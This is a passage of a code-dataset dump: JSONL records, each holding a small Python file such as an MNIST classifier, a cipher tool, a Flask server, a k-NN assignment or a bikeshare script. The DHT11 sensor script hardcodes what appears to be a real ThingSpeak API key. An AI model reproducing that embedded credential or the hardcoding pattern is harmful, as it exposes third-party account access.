text3\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 600\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text4\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 750\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text5\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 900\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text6\r\nword_list 
= wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 1050\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\n\r\nim.show()\r\n\r\n\r\n","sub_path":"game/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"497720655","text":"#!/usr/bin/env python\nfrom flask import Flask\nfrom admin import admin, db, login_manager\nimport conf\n\napp = Flask(__name__)\n# Function to easily find your assets\n# In your template use \napp.jinja_env.globals['static'] = (\n lambda filename: url_for('static', filename = filename)\n)\n\napp.config.from_object('conf.DEMO_FLASK_CONFIG')\nadmin.init_app(app)\ndb.init_app(app)\nlogin_manager.init_app(app)\n\nif __name__ == '__main__':\n\tapp.run(debug = True, port=15000)\n","sub_path":"adminserver.py","file_name":"adminserver.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47283171","text":"#! python\n\nimport tensorflow as tf \n\nimport os\n\n\nmnist = tf.keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nimport matplotlib.pyplot as plt\n\nprint(f'length of x_test {len(x_test)}')\n\n\nmodel_filename= 'ibm_mnist_digits_2lyrs_3epochs.model'\n\n\n\ndef print_bitmap(digit):\n for i in digit:\n j = [f'{x:02X}' if x > 0 else ' ' for x in i]\n j.append('|')\n j = ''.join(j)\n print(j)\n print('--------------------------------------------------')\n\n\n\n\n# print(y_train[0])\n# plt.imshow(x_train[0], plt.cm.binary )\n# plt.show()\n\noriginal_image_test = x_test\n\nx_train = tf.keras.utils.normalize(x_train, axis=1)\nx_test = tf.keras.utils.normalize(x_test, axis=1)\n\n\nif not os.path.exists(model_filename):\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))\n\n model.compile(optimizer='adam', \n loss = 'sparse_categorical_crossentropy',\n metrics= 'accuracy' )\n model.fit(x_train, y_train, epochs=3)\n\n model.save('ibm_mnist_digits_2lyrs_3epochs.model')\n\nelse:\n model = tf.keras.models.load_model(model_filename)\n\n\nval_loss, val_acc = model.evaluate(x_test, y_test)\nprint(val_loss, val_acc)\n\npredictions = model.predict(x_test)\n\nimport numpy as np \n\n\nfor i in range(10):\n\n offset = 3000\n\n\n # plt.imshow(x_test[i+offset], plt.cm.binary )\n # plt.show()\n\n prediction = np.argmax(predictions[i+offset])\n \n print(f'PREDICTED {prediction}')\n print_bitmap(original_image_test[i+offset])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"639295021","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('filename')\nargs = parser.parse_args()\n\nwith open(args.filename, 'r') as f:\n with open('../../ordered.csv','w') as ord:\n for line in f:\n u, v = line.replace('\\n','').split(',')\n if u>v:\n ord.write('{},{}\\n'.format(v, u))\n else:\n 
ord.write(line)\n","sub_path":"experiments/separate.py","file_name":"separate.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95171883","text":"import pandas as pd\nimport numpy as np\nimport argparse\n\n'''\ninterpolate genetic position into an eigenstrat snp file\n'''\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-m', '--map', type = str, default = \"\", help = \"input prefix\")\nparser.add_argument('-i', '--input', type = str, default = \"\", help = \"input snp file\")\nparser.add_argument('-o', '--output', type = str, default = \"\", help = \"output snp file\")\nargs = parser.parse_args()\n\nrecomb_map = pd.read_csv(args.map,\n sep = '\\t',\n header = None,\n names = ['CHROM', 'POS', 'CM'])\n\n\nsnp_input = pd.read_csv(args.input,\n sep = '\\t',\n header = None,\n names = ['ID', 'CHROM', 'CM', 'POS', 'REF', 'ALT'])\n\n\ndef interpolate_genetic_position(recomb_map, chrom, pos):\n '''return interpolated genetic position for a single chromosome\n '''\n recomb_map = recomb_map[recomb_map['CHROM'] == chrom]\n y = np.interp(x = pos, \n xp = recomb_map.POS,\n fp = recomb_map.CM,\n left = 0,\n right = np.max(recomb_map.CM))\n return list(y)\n\n\nall_pos = []\nfor c in range(1, 23):\n pos = snp_input[snp_input['CHROM'] == c]\n y = interpolate_genetic_position(recomb_map, chrom = c, pos = pos)\n all_pos.extend(y)\n\nsnp_output = snp_input.copy()\nsnp_output['CM'] = all_pos\nsnp_output[['ID', 'CHROM', 'CM', 'POS', 'REF', 'ALT']].to_csv(\n args.output,\n sep = '\\t',\n index= False, \n header = False)\n \n ","sub_path":"adnatools/eigenstrat/eigenstrat_CM_filler.py","file_name":"eigenstrat_CM_filler.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449502197","text":"import argparse\nimport json\nimport os\n\nimport redis\n\nfrom pystdlib.uishim import get_selection\nfrom pystdlib import shell_cmd\n\n\nparser = argparse.ArgumentParser(description=\"Searchengines\")\nparser.add_argument(\"--fallback\", dest=\"use_fallback\", action=\"store_true\",\n default=False, help=\"Use fallback browser to open URL\")\nargs = parser.parse_args()\n\nr = redis.Redis(host='localhost', port=6379, db=0)\nsearchengines = json.loads(r.get(\"nav/searchengines\"))\n\n\nsearchengine = get_selection(searchengines.keys(), \"search with\", case_insensitive=True, lines=15, font=\"@wmFontDmenu@\")\nif searchengine:\n meta = searchengines[searchengine]\n url = meta[\"url\"]\n\n browser_cmd = meta.get(\"browser\", \"@defaultBrowser@\")\n if args.use_fallback:\n browser_cmd = \"@fallbackBrowser@\"\n\n vpn = meta.get(\"vpn\", None)\n if vpn:\n shell_cmd(f\"vpnctl --start {vpn}\")\n\n search_term = shell_cmd(\"xsel -o\").replace(\" \", \"+\")\n shell_cmd(f'{browser_cmd} {url}{search_term}'.split(), shell=False)\n","sub_path":"modules/navigation/scripts/search_selection.py","file_name":"search_selection.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444800455","text":"\"\"\"cipherbot2.0.py: Encrypts and decrypts a message using a variable number of user-input keys.\"\"\"\n\nimport random\nimport os\nimport sys\nimport subprocess\n\n\ndef cipher(msg, seed, decrypt=False):\n def convert(msg, from_list, to_list):\n msg = list(msg)\n for letter in range(len(msg)):\n for char in range(len(from_list)):\n if msg[letter] == 
from_list[char]:\n msg[letter] = to_list[char]\n break\n elif msg[letter] == from_list[char].upper():\n msg[letter] = to_list[char].upper()\n break\n return \"\".join(msg)\n\n ALPHABET = list(\"abcdefghijklmnopqrstuvwxyz\")\n salpha = list(\"abcdefghijklmnopqrstuvwxyz\")\n random.seed(seed)\n random.shuffle(salpha)\n random.seed(None)\n if not decrypt:\n return convert(msg, ALPHABET, salpha)\n else:\n return convert(msg, salpha, ALPHABET)\n\n\ndef from_file(prompt):\n filename = input(prompt)\n if not filename.endswith(\".txt\"):\n filename += \".txt\"\n message = []\n with open(os.getcwd() + \"\\\\\" + filename, \"r\") as fh:\n for line in fh:\n message.append(line)\n return \"\\n\".join(message)\n\n\ndef to_file(filename, msg):\n if not filename.endswith(\".txt\"):\n filename += \".txt\"\n with open(os.getcwd() + \"\\\\\" + filename, \"w\") as fh:\n fh.write(msg)\n\n\ndef print_title(title, char=\"#\", simple=False):\n if not simple:\n filler = char * (8 + len(title))\n print(\"\\n \" + filler)\n print(\" {0} {1} {0}\".format(char, title))\n print(\" \" + filler)\n else:\n print(\"\\n {0} \\n {1}\".format(title, char * (6 + len(title))))\n\n\ndef clear_screen():\n command = ([\"clear\"] if not sys.platform.startswith(\"win\")\n else [\"cmd.exe\", \"/C\", \"cls\"])\n subprocess.call(command)\n\n\n# Main\ndef main():\n try:\n while True:\n clear_screen()\n print_title(\"CipherBot 2.0\")\n option = int(input(\"\\n 1. Encryption\\n 2. Decryption\\n > \"))\n\n # Encryption\n if option == 1:\n msg = input(\"\\n Enter a message to encrypt: \")\n\n key_num = int(input(\"\\n How many keys would you like \"\n \"to provide for this encryption?\\n > \"))\n print()\n keys = []\n for num in range(key_num):\n keys.append(input(\" Key #{0:d}: \".format(num + 1)))\n for key in keys:\n msg = cipher(msg, key)\n print(\"\\n Encrypted message: \" + msg)\n\n if input(\"\\n Export this message? (y/n): \") == \"y\":\n filename = input(\"\\n Enter a filename: \")\n to_file(filename, msg)\n\n if input(\"\\n Again? (y/n): \") != \"y\":\n break\n\n # Decryption\n elif option == 2:\n if input(\"\\n Import a message? (y/n): \") == \"y\":\n msg = from_file(\"\\n Enter the name of the file: \")\n else:\n msg = input(\"\\n Enter a message to decrypt: \")\n\n key_num = int(input(\"\\n How many keys were used to encrypt\"\n \" this message?\\n > \"))\n print(\"\\n Enter {0} {1}key{2}{3}:\\n\".format(\n \"this\" if key_num < 2 else \"these\",\n \"\" if key_num < 2 else str(key_num) + \" \",\n \"\" if key_num < 2 else \"s\",\n \" in the same order used to encrypt \"\n \"the message\" if key_num > 1 else \"\"))\n keys = []\n for num in range(key_num):\n keys.append(input(\" Key #{0:d}: \".format(num + 1)))\n for key in reversed(keys):\n msg = cipher(msg, key, True)\n print(\"\\n Decrypted message: \" + msg)\n\n if input(\"\\n Again? 
(y/n): \") != \"y\":\n break\n\n # Anything else\n else:\n break\n except (ValueError, IOError) as err:\n clear_screen()\n print(\"\\n {!s}\".format(err))\n input(\" Press any key to quit: \")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/cipherbot2.0.py","file_name":"cipherbot2.0.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"615195266","text":"# coding: UTF-8\n\nfrom ..models.baby_model import Baby\nfrom ..models.feature_model import Collect\nfrom ..util.seesion_query import *\nfrom ..util.others import page_utils\n\n\ndef baby_list(page):\n \"\"\"\n 全部婴儿列表\n \"\"\"\n baby_count = Baby.query.filter().count()\n page, per_page = page_utils(baby_count, page)\n if baby_count > 1:\n babys = Baby.query.filter()[per_page*(page-1):per_page*page]\n return babys\n else:\n baby = Baby.query.filter().first()\n return baby\n\n\ndef baby_collect_list(page, doctor_id):\n \"\"\"\n 得到医生收藏婴儿列表\n page: 分页,当前页\n doctor_id: 医生的id\n \"\"\"\n result_count = session.query(Baby). \\\n filter(Collect.doctor_id == doctor_id, Collect.type == 'baby').count()\n page, per_page = page_utils(result_count, page)\n if result_count > 1:\n results = session.query(Baby).\\\n filter(Collect.doctor_id == doctor_id, Collect.type == 'baby')[per_page*(page-1):per_page*page]\n return results\n else:\n result = session.query(Baby).\\\n filter(Collect.doctor_id == doctor_id, Collect.type == 'baby').first()\n return result","sub_path":"baby/services/baby_service.py","file_name":"baby_service.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"355092675","text":"import sys\nimport os\nimport click\nimport logging\nimport yaml\nfrom datetime import datetime, timedelta, timezone\n\n\n# 親ディレクトリをアプリケーションのホーム(${app_home})に設定\napp_home = os.path.abspath(os.path.join( os.path.dirname(os.path.abspath(__file__)) , \"..\" ))\n# ${app_home}をライブラリロードパスに追加\nsys.path.append(os.path.join(app_home))\n\nfrom lib import sample_service as service\n\n\ndef cmd () :\n\n # 処理\n try:\n\n # ログ開始\n\n # 設定値取得\n with open('./conf/config.yml', 'r') as yml_file:\n data = yaml.load(yml_file)\n print(data, type(data))\n\n print(data['msg']['ms001'])\n # メッセージID取得\n\n # ここで処理を呼ぶのは一回のみ\n # 呼び先で処理をコントロールする\n # 処理実行\n print(\"***\")\n service.sample()\n\n \n # タイムゾーンの生成\n JST = timezone(timedelta(hours=+9), 'JST')\n datestr = datetime.now(JST).isoformat(timespec='seconds')\n print(\"現在日付: {0}\".format(datestr))\n\n print(\"**\")\n\n # ログ終了\n\n except Exception as e:\n # エラー返却\n print(e)\n # 処理のエラーをここでキャッチ\n sys.exit(1)\n\nif __name__ == '__main__':\n cmd() ","sub_path":"bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"181060524","text":"from django.contrib.admin.models import LogEntry, ADDITION, CHANGE,DELETION\nfrom django.contrib.contenttypes.models import ContentType\nfrom models import *\nimport datetime\nimport string\ndef ignorekey(a):\n d = dict(zip(map(string.lower,a.keys()),a.values()))\n return d\ndef cmp(d1,d2):\n s = u''\n d1 = ignorekey(d1)\n d2 = ignorekey(d2)\n for k in d1.keys():\n if d1[k.lower()] != d2[k.lower()]:\n s = s + '%s:from %s to %s;' % (k,d1[k],d2[k])\n return s\n\ndef log_addition(request, object,name,message):\n LogEntry.objects.log_action(\n user_id = request.user.pk,\n content_type_id = 
ContentType.objects.get_for_model(object).pk,\n object_id = object.pk,\n object_repr = name,\n action_flag = ADDITION,\n change_message = message\n )\n\ndef log_change(request, object,name, message):\n LogEntry.objects.log_action(\n user_id = request.user.pk,\n content_type_id = ContentType.objects.get_for_model(object).pk,\n object_id = object.pk,\n object_repr = name,\n action_flag = CHANGE,\n change_message = message\n )\n\ndef log_deletion(request, object,name,message):\n LogEntry.objects.log_action(\n user_id = request.user.id,\n content_type_id = ContentType.objects.get_for_model(object).pk,\n object_id = object.pk,\n object_repr = name,\n action_flag = DELETION,\n change_message = message\n )\ndef log_login(username,result):\n if result == 'ok':\n i= Loginlog(\n user = username,\n action = 1, \n result = 1,\n message = 'login sucessed'\n )\n i.save()\n else:\n i = Loginlog(\n user = username,\n action = 1,\n result = 2,\n message = 'login failed'\n )\n i.save()\ndef log_logoff(username):\n i= Loginlog(\n user = username,\n action = 2,\n result = 1,\n message = 'logoff sucessed'\n )\n i.save()\n","sub_path":"cmdb/cmdb_log.py","file_name":"cmdb_log.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"124095336","text":"#!/bin/python\n\n# Note, this should be run within the Docker image provided to have all depdendencies, see\n# ../Dockerfile in the base repo along with the README.md for setup instructions\n\nimport pandas\nimport numpy\nimport os\n\n# Let's make sure we are working from CODE HOME\nCODE_HOME = os.environ[\"CODE_HOME\"]\nos.chdir(CODE_HOME)\n\n# First load the data - we have final_3.tsv from Yu, and ideally we should have a pipeline\n# that goes from data collection --> input into this algorithm. 
This will work for now.\nrawData = pandas.read_csv(\"stanford-data/final_3.csv\")\n\n#rawData.shape\n# (117816, 19)\n\n# We want the Stanford data to have the exact same form as the chapman data, meaning\n# these columns\n# 'id', 'impression', 'disease_state', 'uncertainty', 'quality', 'historicity', 'pe rslt'], dtype='object'\n\n# Here is what we have:\n#rawData.columns\n# ['pat_deid', 'order_deid', 'days_age_at_ct', 'rad_report', 'impression',\n# 'batch', 'disease_state_label', 'uncertainty_label', 'quality_label',\n# 'historicity_label', 'disease_state_prob', 'uncertainty_prob',\n# 'quality_prob', 'historicity_prob', 'disease_PEfinder',\n# 'looking_for_PE?', 'train=2/test=1', 'disease_probability_test',\n# 'probability_looking_for_PE'],\n\n# From Chapman paper:\n# ...probably positive and definitely positive were collapsed to positive; probably negative, indeterminate, and definitely negative were considered negative;\n\n# Our disease_state_labels should be mapped onto Neg, Pos, and nan\nlookup = {\"definitely negative\":\"Neg\", \n \"definitely positive\":\"Pos\",\n \"probably negative\":\"Neg\",\n \"probably positive\":\"Pos\",\n \"Indeterminate\":\"Neg\",\n numpy.nan:numpy.nan}\n\ndisease_labels = [lookup[x] for x in rawData.disease_state_label.tolist()]\nrawData['disease_state'] = disease_labels\n\n# Same with uncertainty labels\n# From Chapman paper:\n# definitely negative and definitely positive were considered certain; and probably negative, inderminate, and probably positive were considered uncertain.\nlookup = {\"definitely negative\":\"Yes\", \n \"definitely positive\":\"Yes\",\n \"probably negative\":\"No\",\n \"probably positive\":\"No\",\n \"Indeterminate\":\"No\",\n numpy.nan:numpy.nan}\n\nuncertain_labels = [lookup[x] for x in rawData.uncertainty_label.tolist()]\nrawData['uncertainty'] = uncertain_labels\n\n\n# Quality label\nlookup = {\"diagnostic\":\"Diagnostic\", \n \"non-diagnostic\":\"Not Diagnostic\",\n \"limited\":\"Limited\",\n numpy.nan:numpy.nan}\n\nquality_labels = [lookup[x] for x in rawData.quality_label.tolist()]\nrawData['quality'] = quality_labels\n\n\n# Historicity labels\nlookup = {\"new\":\"New\", \n \"old\":\"Old\",\n \"mixed\":\"Mixed\",\n numpy.nan:numpy.nan}\n\nhist_labels = [lookup[x] for x in rawData.historicity_label.tolist()]\nrawData['historicity'] = hist_labels\n\n# We don't care about the latter columns that were built from a previous model - let's filter\n# down to @mlungren's annotations, and the original reports\n\nrawData = rawData.drop(labels=[\"disease_state_prob\",\"uncertainty_prob\",\"quality_prob\",\"historicity_prob\",\n \"train=2/test=1\",\"disease_probability_test\",\"probability_looking_for_PE\"],axis=1)\n\n# Let's filter down to those that are in a batch (meaning we can ues them)\nrawData = rawData[rawData.disease_state.isnull()==False]\n\n# How many in each batch?\nrawData.batch.value_counts()\n#2.0 474\n#1.0 253\n#4.0 160\n#3.0 57\n#Name: batch, dtype: int64\n\n# Batch 2 has the most, but we know they are not independent from batch 1, so we should use one\n# or the other.\nrawData.to_csv(\"stanford-data/stanford_df.tsv\",sep=\"\\t\")\n","sub_path":"classifiers/0.reportsPrep.py","file_name":"0.reportsPrep.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"248879820","text":"import sys\nimport urllib3\nmyAPI='0F5QQ31B2ZECFJTA'\n#from datetime import datetime\nimport time,board, adafruit_dht\nhttp=urllib3.PoolManager() \ndhtDevice= 
adafruit_dht.DHT11(board.D23) \nwhile True:\n try:\n temperature_c = dhtDevice.temperature\n temperature_f = temperature_c * (9 / 5) + 32\n humidity = dhtDevice.humidity\n# temperature_c = 12\n# temperature_f = 30\n# humidity = 100\n link='https://api.thingspeak.com/update?api_key={0}&field1={1:0.1f}&field2={2:0.1f}'.format(myAPI,temperature_c,humidity)\n r=http.request('GET',link)\n print(r.status)\n \n time.sleep(10)\n except Exception as E:\n print(E)\n time.sleep(5)\n","sub_path":"DHT11_connect_thingspeak.py","file_name":"DHT11_connect_thingspeak.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"14627694","text":"'''\nQuestion 2.1 Skeleton Code\n\nHere you should implement and evaluate the k-NN classifier.\n'''\n\nimport data\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom sklearn.model_selection import KFold\n\nclass KNearestNeighbor(object):\n '''\n K Nearest Neighbor classifier\n '''\n\n def __init__(self, train_data, train_labels):\n self.train_data = train_data\n self.train_norm = (self.train_data**2).sum(axis=1).reshape(-1,1)\n self.train_labels = train_labels\n\n def l2_distance(self, test_point):\n '''\n Compute L2 distance between test point and each training point\n \n Input: test_point is a 1d numpy array\n Output: dist is a numpy array containing the distances between the test point and each training point\n '''\n # Process test point shape\n test_point = np.squeeze(test_point)\n if test_point.ndim == 1:\n test_point = test_point.reshape(1, -1)\n assert test_point.shape[1] == self.train_data.shape[1]\n\n # Compute squared distance\n test_norm = (test_point**2).sum(axis=1).reshape(1,-1)\n dist = self.train_norm + test_norm - 2*self.train_data.dot(test_point.transpose())\n \n return np.squeeze(dist)\n\n def query_knn(self, test_point, k):\n '''\n Query a single test point using the k-NN algorithm\n\n You should return the digit label provided by the algorithm\n '''\n l2_distance = self.l2_distance(test_point)\n sorted_labels = self.train_labels[np.argpartition(l2_distance, (1,k))]\n \n tie = True\n digit = \"\"\n nn_votes = defaultdict(int)\n for i in range(0, k):\n nn_votes[sorted_labels[i]] += 1\n \n while (tie):\n highest_vote = max(nn_votes.values())\n if(len([key for key, value in nn_votes.items() if value == highest_vote]) > 1):\n k -= 1\n nn_votes[sorted_labels[k]] -= 1 \n continue\n else:\n digit = max(nn_votes, key=nn_votes.get)\n tie = False\n \n return digit\n\ndef cross_validation(train_data, train_labels, k_range=np.arange(1,16)):\n '''\n Perform 10-fold cross validation to find the best value for k\n\n Note: Previously this function took knn as an argument instead of train_data,train_labels.\n The intention was for students to take the training data from the knn object - this should be clearer\n from the new function signature.\n '''\n folds = 10\n kf = KFold(n_splits=folds)\n best_k = 1\n average_accuracy_for_best_k = 0\n \n for k in k_range:\n accuracy_sum = 0\n for train_index, test_index in kf.split(train_data):\n X_train, X_test = train_data[train_index], train_data[test_index]\n y_train, y_test = train_labels[train_index], train_labels[test_index]\n \n knn = KNearestNeighbor(X_train, y_train)\n validation_accuracy = classification_accuracy(knn, k, X_test, y_test)\n accuracy_sum += validation_accuracy\n \n average_accuracy = accuracy_sum/folds\n if (average_accuracy > average_accuracy_for_best_k):\n 
average_accuracy_for_best_k = average_accuracy\n best_k = k \n \n return best_k, average_accuracy_for_best_k\n\ndef classification_accuracy(knn, k, eval_data, eval_labels):\n '''\n Evaluate the classification accuracy of knn on the given 'eval_data'\n using the labels\n '''\n accuracy_counter = defaultdict(bool)\n for i in range(0, eval_data.shape[0]):\n label = knn.query_knn(eval_data[i], k)\n accuracy_counter[label == eval_labels[i]] += 1\n \n return accuracy_counter[True]/eval_data.shape[0]\n\ndef main():\n train_data, train_labels, test_data, test_labels = data.load_all_data('data')\n knn = KNearestNeighbor(train_data, train_labels)\n \n optimal_k, average_accuracy_for_best_k = cross_validation(train_data, train_labels) \n print(\"The optimal k is {:d}\".format(optimal_k))\n print(\"The average accuracy across folds for k={:d} is {:f}\".format(optimal_k, average_accuracy_for_best_k))\n print(\"The training accuracy for k={:d} is {:f}\".format(optimal_k, classification_accuracy(knn, optimal_k, train_data, train_labels)))\n print(\"The test accuracy for k={:d} is {:f}\".format(optimal_k, classification_accuracy(knn, optimal_k, test_data, test_labels)))\n\nif __name__ == '__main__':\n main()","sub_path":"CSC411_Machine_learning_and_Data_Mining/assignment2/q2_1.py","file_name":"q2_1.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"186979587","text":"# Spencer Brase\n# CTEC 121 / Summer 2019\n# Module 4 / Problem Set 5 \n# Problem 2 (50 points)\n\n\"\"\"\nUsing the graphics library, develop a Python program to draw the a set of LEGOS. You will find a picture of the LEGO's in a file named LEGOS.png.\n\nBe sure to create one LEGO and then use the .clone() method whenever possible to create the other five.\n\"\"\"\n\nfrom graphics import *\n\ndef main():\n win = GraphWin(\"Legos\", 800,800)\n # draw the base of the Lego\n base1 = Rectangle(Point(20,160),Point(240,230))\n base1.setFill(\"black\")\n base1.setWidth(2)\n base1.setOutline(\"red\")\n base1.draw(win)\n # Draw the knubs on to of the base of the lego\n knub1 = Rectangle(Point(30,149),Point(60,160))\n knub1.setFill(\"black\")\n knub1.setWidth(4)\n knub1.setOutline(\"red\")\n knub1.draw(win)\n knub2 = Rectangle(Point(80,149),Point(110,160))\n knub2.setFill(\"black\")\n knub2.setWidth(4)\n knub2.setOutline(\"red\")\n knub2.draw(win)\n knub3 = Rectangle(Point(130,149),Point(160,160))\n knub3.setFill(\"Black\")\n knub3.setWidth(4)\n knub3.setOutline(\"red\")\n knub3.draw(win)\n knub4 = Rectangle(Point(180,149),Point(210,160))\n knub4.setFill(\"Black\")\n knub4.setWidth(4)\n knub4.setOutline(\"red\")\n knub4.draw(win)\n base2 = base1.clone()\n base2.move(235, 20)\n base2.setFill(\"red\")\n base2.setOutline(\"black\")\n base2.setWidth(4)\n base2.draw(win)\n base3 = base1.clone()\n base3.move(500, 20)\n base3.setFill(\"Blue\")\n base3.setOutline(\"Black\")\n base3.setWidth(4)\n base3.draw(win)\n base4 = base1.clone()\n base4.setFill(\"Green\")\n base4.setOutline(\"Black\")\n base4.setWidth(4)\n base4.move(20, 120)\n base4.draw(win)\n base5 = base1.clone()\n base5.setFill(\"Cyan\")\n base5.setOutline(\"Black\")\n base5.setWidth(4)\n base5.move(250, 120)\n base5.draw(win)\n base6= base1.clone()\n base6.setFill(\"Brown\")\n base6.setOutline(\"Black\")\n base6.setWidth(4)\n base6.move(500, 120)\n base6.draw(win)\n knub2 = knub1.clone()\n knub2.move(240, 20)\n knub2.setFill(\"Red\")\n knub2.setWidth(4)\n knub2.setOutline(\"Black\")\n 
knub2.draw(win)\n knub3 = knub2.clone()\n knub3.move(50, 0)\n knub3.draw(win)\n knub4 = knub2.clone()\n knub4.move(100, 0)\n knub4.draw(win)\n knub5 = knub2.clone()\n knub5.move(150, 0)\n knub5.draw(win)\n knub6 = knub2.clone()\n knub6.move(260, 0)\n knub6.setFill(\"Blue\")\n knub6.draw(win)\n knub7 = knub2.clone()\n knub7.move(320, 0)\n knub7.setFill(\"Blue\")\n knub7.draw(win)\n knub8 = knub2.clone()\n knub8.setFill(\"Blue\")\n knub8.move(370, 0)\n knub8.draw(win)\n knub9 = knub2.clone()\n knub9.setFill(\"Blue\")\n knub9.move(420, 0)\n knub9.draw(win)\n knub10 = knub1.clone()\n knub10.move(20, 120)\n knub10.setFill(\"Green\")\n knub10.setOutline(\"black\")\n knub10.draw(win)\n knub11 = knub1.clone()\n knub11.setFill(\"Green\")\n knub11.setOutline(\"Black\")\n knub11.move(70, 120)\n knub11.draw(win)\n knub12 = knub1.clone()\n knub12.move(120, 120)\n knub12.setFill(\"Green\")\n knub12.setOutline(\"Black\")\n knub12.draw(win)\n knub13 = knub1.clone()\n knub13.move(120, 135)\n knub13.setFill(\"Green\")\n knub13.setOutline(\"Black\")\n knub14 = knub1.clone()\n knub14.move(170, 120)\n knub14.setFill(\"Green\")\n knub14.setOutline(\"Black\")\n knub14.draw(win)\n knub15 = knub14.clone()\n knub15.move(100, 0)\n knub15.setFill(\"Cyan\")\n knub15.draw(win)\n knub16 = knub14.clone()\n knub16.setFill(\"Cyan\")\n knub16.move(149, 0)\n knub16.draw(win)\n knub17 = knub14.clone()\n knub17.setFill(\"Cyan\")\n knub17.move(200, 0)\n knub17.draw(win)\n knub18 = knub14.clone()\n knub18.setFill(\"Cyan\")\n knub18.move(240, 0)\n knub18.draw(win)\n knub19 = knub14.clone()\n knub19.setFill(\"Brown\")\n knub19.move(340, 0)\n knub19.draw(win)\n knub20 = knub14.clone()\n knub20.setFill(\"Brown\")\n knub20.move(400, 0)\n knub20.draw(win)\n knub21 = knub14.clone()\n knub21.move(450, 0)\n knub21.setFill(\"Brown\")\n knub21.draw(win)\n knub22 = knub14.clone()\n knub22.setFill(\"Brown\")\n knub22.move(490, 0)\n knub22.draw(win)\n\n # close the program\n input(\"Press Enter to close Program\")\n # close graphics window\n win.close()\n\n \n\n\nmain()","sub_path":"problem-set-5-problem-2.py","file_name":"problem-set-5-problem-2.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"474517479","text":"import time\nimport numpy as np\nimport pandas as pd\n\ncity_data = {'chicago':'chicago.csv',\n 'new york':'new_york_city.csv',\n 'washington':'washington.csv'\n }\ndef filter_data():\n \"\"\"ask user to select a city (str), month(str), and day(str, from monday to sunday)\n if there is no specific preference, please use \"all\"\"\"\n invalid_input = ('invalid input, try again')\n print (\"Let us explore some US bikeshare data!\")\n while True:\n city = input(\"Type a city! (chicago, new york, washington or all to include all of them)\\n\").lower()\n if city in ['chicago', 'new york', 'washington', 'all']:\n print ('input pass')\n break\n else:\n print (invalid_input)\n\n while True:\n month = input (\"Type a month! (from january to june, or all to include all months)\\n\").lower()\n if month in [\"january\", \"february\", \"march\", \"april\", \"may\", \"june\", \"all\"]:\n print ('input pass')\n break\n else:\n print (invalid_input)\n\n while True:\n day = input (\"Type a day! 
